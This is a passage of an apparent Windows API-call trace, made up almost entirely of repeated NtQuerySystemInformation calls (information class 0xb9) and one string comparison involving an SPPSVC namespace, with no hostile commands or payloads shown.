Length=0x0, ResultLength=0x0) [0210.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe980, Length=0x50, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x28, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0210.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe980, Length=0x50, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe980, Length=0x50, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe980, Length=0x50, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe870, Length=0x50, ResultLength=0x0) [0210.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5d0, Length=0x28, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe640, Length=0x28, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0210.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6c0, Length=0x28, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5a0, Length=0x20, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7a0, Length=0x38, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe620, Length=0x20, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe5b0, Length=0x20, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe9b0, Length=0x28, ResultLength=0x0) [0210.260] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfea30, Length=0x50, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe960, Length=0x38, ResultLength=0x0) [0210.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe790, Length=0x28, ResultLength=0x0) [0210.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe790, Length=0x28, ResultLength=0x0) [0210.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe790, Length=0x28, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe800, Length=0x28, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe960, Length=0x38, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x28, ResultLength=0x0) [0210.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe880, Length=0x28, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe720, Length=0x20, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6a0, Length=0x20, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe960, Length=0x38, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe960, Length=0x38, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x20, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe770, Length=0x20, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x50, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x50, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe7e0, Length=0x50, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x50, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x50, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x50, ResultLength=0x0) [0210.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe6d0, Length=0x50, ResultLength=0x0) [0210.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe600, Length=0x38, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe430, Length=0x28, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe430, Length=0x28, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe430, Length=0x28, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe430, Length=0x28, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe4a0, Length=0x28, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe600, Length=0x38, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0210.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe520, Length=0x28, ResultLength=0x0) [0210.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe3c0, Length=0x20, ResultLength=0x0) [0210.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe340, Length=0x20, ResultLength=0x0) [0210.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe340, Length=0x20, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe340, Length=0x20, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe600, Length=0x38, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe600, Length=0x38, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe480, Length=0x20, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe410, Length=0x20, ResultLength=0x0) [0210.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.290] 